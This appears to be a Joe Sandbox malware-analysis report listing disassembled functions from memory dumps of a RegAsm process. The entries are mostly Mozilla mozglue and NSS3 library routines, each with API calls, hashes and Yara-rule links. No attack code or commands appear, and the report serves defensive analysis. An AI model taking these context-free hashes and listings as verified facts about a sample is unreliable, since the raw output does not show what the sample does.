String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: a093da09d5db10fdf7b21dcb42b6369e5b48134d18ba506ff9183da54d364e98
Instruction ID: 7219d6a93f17e98bbae282a79319629fdd858504c5800300cf98874a991a395a
Opcode Fuzzy Hash: a093da09d5db10fdf7b21dcb42b6369e5b48134d18ba506ff9183da54d364e98
Instruction Fuzzy Hash: 6A11D6A6F021315AEB11ABF53C00AAE39B85B4318CF381534E809D6F51FB24D529C2F3

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBC31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CBC3217
Part of subcall function 6CBC31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CBC3236
Part of subcall function 6CBC31C0: FreeLibrary.KERNEL32 ref: 6CBC324B
Part of subcall function 6CBC31C0: __Init_thread_footer.LIBCMT ref: 6CBC3260
Part of subcall function 6CBC31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CBC327F
Part of subcall function 6CBC31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CBC328E
Part of subcall function 6CBC31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CBC32AB
Part of subcall function 6CBC31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CBC32D1
Part of subcall function 6CBC31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CBC32E5
Part of subcall function 6CBC31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CBC32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CBD9675
__Init_thread_footer.LIBCMT ref: 6CBD9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CBD96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CBD9707
__Init_thread_footer.LIBCMT ref: 6CBD971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CBD9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CBD97B7
FreeLibrary.KERNEL32 ref: 6CBD97D0
FreeLibrary.KERNEL32 ref: 6CBD97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CBD9824

Strings

MapViewOfFileNuma2, xrefs: 6CBD97B1
ntdll.dll, xrefs: 6CBD96E3
NtMapViewOfSection, xrefs: 6CBD9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6CBD9670

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 1fc9608addbbfc655f628e2cb1877da7de7daf564832c6ebc9a69ceb3924577b
Instruction ID: 98fa798d9ad34f2d82863d2d901e8f1e657414f072f1d03f744e84c47f02618b
Opcode Fuzzy Hash: 1fc9608addbbfc655f628e2cb1877da7de7daf564832c6ebc9a69ceb3924577b
Instruction Fuzzy Hash: 9A61E671B00245AFDF00EFA5D994B9A7BB1EB4A31CF11C529ED1593B80DB34A854CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CE71DE0,?), ref: 6CDA6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CDA6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CDA6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CDA6D82
DER_GetInteger_Util.NSS3(?), ref: 6CDA6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CDA6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CDA6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CDA6F19
PK11_DigestBegin.NSS3(00000000), ref: 6CDA6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CDA6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CDA7011
PK11_FreeSymKey.NSS3(00000000), ref: 6CDA7033
free.MOZGLUE(?), ref: 6CDA703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CDA7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CDA7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CDA70AF

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 77781b26ef1823087de95f8b45f6d8b011791ce647e6631a6ce32aadf124b5b3
Instruction ID: e3302116d9ec7e82ea2c3de307ead5daf213111846d91cb5badfe85785c322e2
Opcode Fuzzy Hash: 77781b26ef1823087de95f8b45f6d8b011791ce647e6631a6ce32aadf124b5b3
Instruction Fuzzy Hash: C6A1F671905200DBEB008BA8DC85B5E32E4DB8570CF248939E959CBAB1F775D947C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 6CD6AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CD4AB95,00000000,?,00000000,00000000,00000000), ref: 6CD6AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CD4AB95,00000000,?,00000000,00000000,00000000), ref: 6CD6AF39
PR_Unlock.NSS3(?,?,?,6CD4AB95,00000000,?,00000000,00000000,00000000), ref: 6CD6AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CD4AB95,00000000,?,00000000,00000000,00000000), ref: 6CD6AF69
TlsGetValue.KERNEL32 ref: 6CD6B06B
EnterCriticalSection.KERNEL32(?), ref: 6CD6B083
PR_Unlock.NSS3(?), ref: 6CD6B0A4
TlsGetValue.KERNEL32 ref: 6CD6B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CD6B0D9
PR_Unlock.NSS3 ref: 6CD6B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CD6B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CD6B182

Part of subcall function 6CD9FAB0: free.MOZGLUE(?,-00000001,?,?,6CD3F673,00000000,00000000), ref: 6CD9FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CD6B177

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CD4AB95,00000000,?,00000000,00000000,00000000), ref: 6CD6B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CD4AB95,00000000,?,00000000,00000000,00000000), ref: 6CD6B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CD4AB95,00000000,?,00000000,00000000,00000000), ref: 6CD6B1C2

Part of subcall function 6CD91560: TlsGetValue.KERNEL32(00000000,?,6CD60844,?), ref: 6CD9157A
Part of subcall function 6CD91560: EnterCriticalSection.KERNEL32(?,?,?,6CD60844,?), ref: 6CD9158F
Part of subcall function 6CD91560: PR_Unlock.NSS3(?,?,?,?,6CD60844,?), ref: 6CD915B2

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 826ab73af0a2a148db6c60d9be3dcfa5003555667877d34ce279f5948bf75880
Instruction ID: d967a67d3f5dcadd490145117cc9efefbd019e6bc21fafb4105e2fdfbcd1a5cd
Opcode Fuzzy Hash: 826ab73af0a2a148db6c60d9be3dcfa5003555667877d34ce279f5948bf75880
Instruction Fuzzy Hash: CDA1A3B1E00205EFEF009F65DC81AEE7BB4EF49308F144125E909A7B61E735E959CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD7FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6CBD8007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6CBD801D

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6CBD802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6CBD803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6CBD808D

Part of subcall function 6CBDCA10: mozalloc_abort.MOZGLUE(?), ref: 6CBDCAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6CBD809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CBD80B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CBD80DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBD80ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBD80FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBD810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CBD8133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6CBD8149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6CBD8167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6CBD817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBD8199

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID:
API String ID: 2721933968-0
Opcode ID: ac153717f25cb096bc333c73529c83094487b913dfb2175a808a86425f2a7ca0
Instruction ID: ddbf7099a03d1ced8aece3a949797f393d46ef970505bfa18a394307be02f5e6
Opcode Fuzzy Hash: ac153717f25cb096bc333c73529c83094487b913dfb2175a808a86425f2a7ca0
Instruction Fuzzy Hash: 4F51C4B2E002549BDB00DFA9DC84AEFB7B9EF49364F151125E815E7740E731A908CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC26660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6CC4F618), ref: 6CC26694
GetThreadId.KERNEL32(?), ref: 6CC266B1
GetCurrentThreadId.KERNEL32 ref: 6CC266B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6CC266E1
EnterCriticalSection.KERNEL32(6CC4F618), ref: 6CC26734
GetCurrentProcess.KERNEL32 ref: 6CC2673A
LeaveCriticalSection.KERNEL32(6CC4F618), ref: 6CC2676C
GetCurrentThread.KERNEL32 ref: 6CC267FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CC26868
RtlCaptureContext.NTDLL ref: 6CC2687F

Strings

WalkStack64, xrefs: 6CC26890

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 6f7dd035ea437dc72ede2f7169587367f79e8e75f4ce6d7e0ef4bc32360ca4a8
Instruction ID: 4de90eaf6b044d8a33516e16d15573ccb138eb35ed21ae52ff210cb60a1b674b
Opcode Fuzzy Hash: 6f7dd035ea437dc72ede2f7169587367f79e8e75f4ce6d7e0ef4bc32360ca4a8
Instruction Fuzzy Hash: 9851AC71A09B01AFD711DF25C844B5EBBF4FF89718F00892DF99987640E774E9088BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC0DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBD4A68), ref: 6CC0945E
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC09470
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC09482
Part of subcall function 6CC09420: __Init_thread_footer.LIBCMT ref: 6CC0949F

GetCurrentThreadId.KERNEL32 ref: 6CC0DE73
GetCurrentThreadId.KERNEL32 ref: 6CC0DF7D
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0DF8A
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0DFC9
GetCurrentThreadId.KERNEL32 ref: 6CC0DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC0E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CBD4A68), ref: 6CC0DE7B

Part of subcall function 6CC094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC094EE
Part of subcall function 6CC094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC09508

Part of subcall function 6CBFCBE8: GetCurrentProcess.KERNEL32(?,6CBC31A7), ref: 6CBFCBF1
Part of subcall function 6CBFCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CBC31A7), ref: 6CBFCBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CBD4A68), ref: 6CC0DEB8
free.MOZGLUE(00000000,?,6CBD4A68), ref: 6CC0DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC0DF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6CC0DE83
<none>, xrefs: 6CC0DFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CC0E00E

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 7bd63824a18d82361941d62dea5a6951f6e293fe00a088248e011a3a2f8f981b
Instruction ID: b86f61c831332803de31ba4568a1136d4c5dac37176296357ce8892e23832cca
Opcode Fuzzy Hash: 7bd63824a18d82361941d62dea5a6951f6e293fe00a088248e011a3a2f8f981b
Instruction Fuzzy Hash: 21412435B016109FEB10AF65D818BAEB775EF8631CF14C019E91987F01EB329809CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CDBAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDBADB1

Part of subcall function 6CD9BE30: SECOID_FindOID_Util.NSS3(6CD5311B,00000000,?,6CD5311B,?), ref: 6CD9BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CDBADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CDBAE08

Part of subcall function 6CD9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CE718D0,?), ref: 6CD9B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CDBAE25
PL_FreeArenaPool.NSS3 ref: 6CDBAE63
PR_CallOnce.NSS3(6CEA2AA4,6CDA12D0), ref: 6CDBAE4D

Part of subcall function 6CCC4C70: TlsGetValue.KERNEL32(?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4C97
Part of subcall function 6CCC4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4CB0
Part of subcall function 6CCC4C70: PR_Unlock.NSS3(?,?,?,?,?,6CCC3921,6CEA14E4,6CE0CC70), ref: 6CCC4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDBAE93
PR_CallOnce.NSS3(6CEA2AA4,6CDA12D0), ref: 6CDBAECC
PL_FreeArenaPool.NSS3 ref: 6CDBAEDE
PL_FinishArenaPool.NSS3 ref: 6CDBAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDBAEF5
PL_FinishArenaPool.NSS3 ref: 6CDBAF16

Strings

security, xrefs: 6CDBADEE

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: f9c0127e3525a68d1722d1ab7022835e385b0d8b62074997216f33872293c29f
Instruction ID: 94e2029c534ef4a500ea272c07114495dede3f34e1fca73419de26704e6ece3d
Opcode Fuzzy Hash: f9c0127e3525a68d1722d1ab7022835e385b0d8b62074997216f33872293c29f
Instruction Fuzzy Hash: 474108F5A04200ABE7214B18DC45BAE32B4AB4570CF500525F85AA6F61FB35D919C7E3

Uniqueness

Uniqueness Score: -1.00%

Function 6CD58DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CD58E22
EnterCriticalSection.KERNEL32(?), ref: 6CD58E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CD58E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CD58E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CD58E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CD58EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CD58EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CD58EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CD58F00
free.MOZGLUE(?), ref: 6CD58F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CD58F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CD58F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CD58F5B
PR_Unlock.NSS3(?), ref: 6CD58F72
PR_Unlock.NSS3(?), ref: 6CD58F82

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 552962d893614feb61e6fc8ed405f70a1c8db6c17cdf52e99d07ef7d22cd2cc6
Instruction ID: 07f0437766f9311b09e837fe4a0f44f5e8703e8ab93bff615fbc733892b90b3b
Opcode Fuzzy Hash: 552962d893614feb61e6fc8ed405f70a1c8db6c17cdf52e99d07ef7d22cd2cc6
Instruction Fuzzy Hash: 3E512AB2E402059FDB009F68CC8496EB7B9EF45358F54412AEC189B720E732ED65C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD7CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6CD7CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CD7CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6CD7CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6CD7CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6CD7CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CD7CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6CD7CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6CD7CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6CD7CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6CD7CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6CD7CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6CD7CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6CD7CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6CD7D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6CD7D021

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: d2697fb8943041bfb72ec8c64daa6b65ff51d5301a2c62400b2f53987d88d7b2
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 5331A375B9791023EF2D025AAC65BDE104A4B6630EF04103CF90AFA7D0F695DE1B02F9

Uniqueness

Uniqueness Score: -1.00%

Function 6CE50FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6CE51000

Part of subcall function 6CE09BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CD31A48), ref: 6CE09BB3
Part of subcall function 6CE09BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CD31A48), ref: 6CE09BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CE51016

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

PR_Unlock.NSS3(?), ref: 6CE51021

Part of subcall function 6CDEDD70: TlsGetValue.KERNEL32 ref: 6CDEDD8C
Part of subcall function 6CDEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CDEDDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CE51046
PR_Unlock.NSS3(?), ref: 6CE5106B
PR_Lock.NSS3 ref: 6CE51079
PR_Unlock.NSS3 ref: 6CE51096
free.MOZGLUE(?), ref: 6CE510A7
